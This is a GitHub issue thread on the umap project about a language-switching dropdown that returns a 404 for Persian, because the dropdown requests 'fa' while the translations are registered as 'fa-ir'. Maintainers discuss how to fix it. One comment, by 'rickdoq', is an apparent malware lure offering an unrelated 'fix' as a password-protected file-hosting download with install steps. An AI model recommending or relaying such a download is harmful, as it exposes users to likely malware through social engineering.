### ISSUE TITLE
Language switching dropdown not working as expected

### ISSUE THREAD

**Issue by iriman** [umap-project/umap#2086]
**Describe the bug**
Language switching dropdown on main page doesn't work for Persian language.

**To Reproduce**
1. Go to 'https://umap.openstreetmap.fr/en/'
2. Click on 'English' dropdown and the bottom of page and choose 'فارسی'
3. See error '404 not found'

**Expected behavior**
Switching language of website

**Additional context**
By clicking on the button, page address ends with '/fa' and gives error. But when opening website on a device with Persian locale, it ends with '/fa-ir' and this works correctly.

**Comment by rickdoq** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by yohanboniface** [comment]
Thanks for the report, the registered language version seems to be `fa-ir`, but the dropbox ask for `fa`. See "https://umap.openstreetmap.fr/fa-ir/". I'll have a look soon.

**Comment by yohanboniface** [comment]
@iriman We have `fa-ir` in translations, but Django does not know about `fa-ir`. Should I register `fa-ir` in Django or move all `fa-ir` translations to `fa` (given it is untranslated at this time) and just keep `fa` ?

**Comment by iriman** [comment]
There is another language code fa-Af for Farsi in Afghanistan that is slightly different from Farsi in Iran.
IMO there's no problem if you move translations from fa-ir to fa, unless someone request for a specific fa-AF translation on transifex in future.
